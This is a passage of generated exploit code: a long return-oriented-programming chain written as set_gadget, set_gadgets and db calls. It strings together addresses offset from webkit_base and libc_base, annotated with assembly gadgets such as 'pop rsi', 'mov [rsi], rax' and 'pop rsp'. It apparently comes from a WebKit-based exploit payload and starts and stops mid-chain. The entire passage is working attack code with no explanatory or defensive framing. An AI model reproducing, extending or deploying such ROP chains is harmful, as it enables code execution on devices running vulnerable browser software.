[rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+482520, //L10436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10435: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10436: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10438: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+482648, //L10441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+482632, //L10440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10440: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10441: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+483648, //L10439 //L10401: libc_base+764760, //pop rsi ropchain+482712, //L10442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10442: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10444: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+482832, //L10447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+482816, //L10445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10445: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10447: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+482992, //L10451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+482944, //L10448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi 
ropchain+482960, //L10449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10448: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10449: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10450: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10451: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+483048, //L10452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10454: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+483168, //L10455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+483184, //L10457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10455: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10457: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+483360, //L10460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+483376, //L10461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+483328, //L10458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+483344, //L10459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10458: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10459: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10460: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10461: 
db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+483536, //L10465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+483504, //L10463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+483520, //L10464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10462: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10463: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10465: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+483640, //L10467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+483624, //L10466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10466: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10467: db([0, 0]); // 0x0 //L10439: //L10376: set_gadgets([ libc_base+764760, //pop rsi ropchain+483688, //L10468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10468: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10470: db([4294967224, 4294967295]); // -0x48 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L10472: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+483848, //L10475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+483832, //L10473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov 
rax, rcx libc_base+763368 //pop rcx ]); //L10473: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10475: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+484024, //L10478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+484040, //L10479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+483992, //L10476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+484008, //L10477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10476: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10477: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10478: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10479: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+484136, //L10481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+484120, //L10480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10481: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+484216, //L10482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10482: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10484: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+484336, //L10487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+484320, //L10485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10487: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+484512, //L10490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+484528, //L10491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+484480, //L10488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+484496, //L10489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10488: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10490: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10491: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+484624, //L10493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+484608, //L10492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10492: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10493: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+484704, //L10494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10494: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10496: db([4294967284, 4294967295]); // 
-0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+484824, //L10499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+484808, //L10497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10497: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10499: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+485000, //L10502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+485016, //L10503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+484968, //L10500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+484984, //L10501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10500: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10501: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10503: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+485112, //L10505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+485096, //L10504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10504: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10505: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+485192, //L10506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov 
rax, r8 libc_base+763368 //pop rcx ]); //L10506: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10508: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+485312, //L10511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+485296, //L10509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10509: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10511: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+485488, //L10514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+485504, //L10515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+485456, //L10512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+485472, //L10513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10512: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10513: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10515: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+485664, //L10519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+485632, //L10517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+485648, //L10518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10516: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10517: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10519: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+485768, //L10521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+485752, //L10520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10521: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10522: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10523: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+485936, //L10524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10526: db([4294967224, 4294967295]); // -0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+486056, //L10529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+486040, //L10527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10527: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10529: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+486232, //L10532 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+486248, //L10533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+486200, //L10530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+486216, //L10531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10530: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10531: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10532: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10533: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+486408, //L10537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+486376, //L10535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+486392, //L10536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10534: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10535: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10536: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10537: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+486512, //L10539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+486496, //L10538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10538: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10539: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; 
mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+486592, //L10540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10540: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10542: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+486712, //L10545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+486696, //L10543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10543: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10545: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+486856, //L10548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+486824, //L10546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+486840, //L10547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10546: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10547: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10548: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+486936, //L10549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10549: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10551: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+487056, //L10554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+487040, //L10552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10552: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10554: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+487200, //L10557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+487168, //L10555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+487184, //L10556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10555: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10556: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10557: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+487280, //L10558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10558: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10560: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+487400, //L10563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+487384, //L10561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10561: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10563: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+487544, //L10566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+487512, //L10564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+487528, //L10565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10564: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10565: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10566: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+487624, //L10567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10567: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10569: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+487744, //L10572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+487728, //L10570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10570: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10572: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+487888, //L10575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+487856, //L10573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+487872, //L10574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10573: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10574: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10575: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, 
//sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L10577: ropchain+487992, //L10576 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+275424, //__ntoa_long //L10576: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+488064, //L10578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10578: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10580: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+488144, //L10581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10581: db([0, 0]); // 0x0 //L10313: //L10168: //L10025: set_gadgets([ libc_base+764760, //pop rsi ropchain+488192, //L10583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10583: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10585: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+488312, //L10588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+488296, //L10586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10586: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10588: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+488456, //L10591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+488424, //L10589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+488440, //L10590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10589: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10590: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+488544, //L10593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10592: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10593: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+488600, //L10594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10594: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10596: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+488680, //L10598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 